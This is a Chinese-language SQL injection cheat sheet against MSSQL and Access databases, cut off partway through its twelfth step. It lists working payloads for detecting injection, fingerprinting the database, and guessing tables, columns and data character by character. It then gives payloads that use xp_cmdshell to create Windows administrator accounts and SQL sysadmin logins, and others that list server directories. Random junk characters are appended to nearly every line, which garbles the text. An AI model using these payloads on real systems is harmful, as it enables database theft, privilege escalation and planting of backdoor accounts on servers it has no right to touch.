1.判断是否有注入;and 1=1 ;and 1=2 {b,#l]v
2.初步判断是否是mssql ;and user>0 H"b}lf
>c30kpGg
3.注入参数是字符'and [查询条件] and ''=' ;!:@3c
'7yVvd
4.搜索时没过滤参数的'and [查询条件] and '%25'=' x%J.$o[<_
[}Z!hq
5.判断数据库系统 ~!7!Y~(+
bNh~=[E
;and (select count(*) from sysobjects)>0 mssql hi0-Sw
V2oXg
;and (select count(*) from msysobjects)>0 access Xaw&41K
d`sIgll&n
kE[Hq-J=N
\N a
6.猜数据库 ;and (select Count(*) from [数据库名])>0 S2PPwCU
%G>
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 _xu_W;nh
FCIA8^}s
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 +Ua.\1"6
dw YGhhm
9.(1)猜字段的ascii值(access) 6}JW- sA
LB\+*P6QM
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ;=lQMKx0
@!KG;d:l
(2)猜字段的ascii值(mssql) I4Rd2G_
Wagb|B\
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 t2_pwd*B
B!AJ*
10.测试权限结构(mssql) 8;<3Tyjzu
bFB.hkTP
g$T%
C?
HLb`'TC3r+
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- zW:r7
P.
\H{UJ
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- %(ms74R+
KYM%U"j D
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 20`QA
u)'
Lgrpy
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- a_(fqoW
k`=&m"
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- bZCNW$C3l
*T-v^ndJh
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- f5P@PG]{
Cm%xI&Y
;and 1=(select IS_MEMBER('db_owner'));-- 7*(K%e"U
c+N\uG4
!n`Y^
>o4Ih^VB
11.添加mssql和系统的帐户 n _eN|m?@
7R#$Hm
;exec master.dbo.sp_addlogin username;-- 2B[I-
K s
;exec master.dbo.sp_password null,username,password;-- 0NMmN_Lr
]EfM;'j[
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 9/dI 6 P7
|*y'H*
;exec master.dbo.xp_cmdshell 'net user username password }~!KjFbs
k. ?@qCs[
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- qt=nN-AC(
b0aV?A}th
;exec master.dbo.xp_cmdshell 'net user username password /add';-- EncJB
cL^r^kL("
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Tu7}*vsR
_5H0<%\
UE 1tm
3)3$ L
12.(1)遍历目录 4%>2>5
v
O@7o
;create table dirs(paths varchar(100), id int) EeDK ^W8N
gT#hF]c:
;insert dirs exec master.dbo.xp_dirtree 'c:\' tE]Y=x[Ux
.*{0[
;and (select top 1 paths from dirs)>0 f19'IH$n{
>*"1`vcxF
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) {33B%5n"
UO}Yr8Z;
@%
.;}tC
VskdC?yIp
(2)遍历目录 ;hCUy=m.
@!,W]?{
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- pe>[Ts`2F
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 =S<